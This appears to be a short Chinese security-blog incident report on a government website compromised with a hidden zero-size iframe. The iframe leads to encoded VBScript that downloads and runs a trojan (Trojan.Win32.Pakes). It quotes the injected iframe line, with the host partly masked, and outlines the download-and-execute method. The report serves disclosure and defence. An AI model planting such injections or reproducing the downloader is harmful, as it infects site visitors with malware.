01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

简介: 01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

该政府网站首页被加入代码:

/--------
<iframe src=hxxp://www.***.race*s**wd.com.**/w*m***.htm width=0 height=0 frameborder=0></iframe>
--------/

w*m***.htm      的内容为escape()加密的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 1**.exe,保存为 %temp% 中的 asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。


目录
打赏
0
1
1
0
57
分享
相关文章
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码
某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等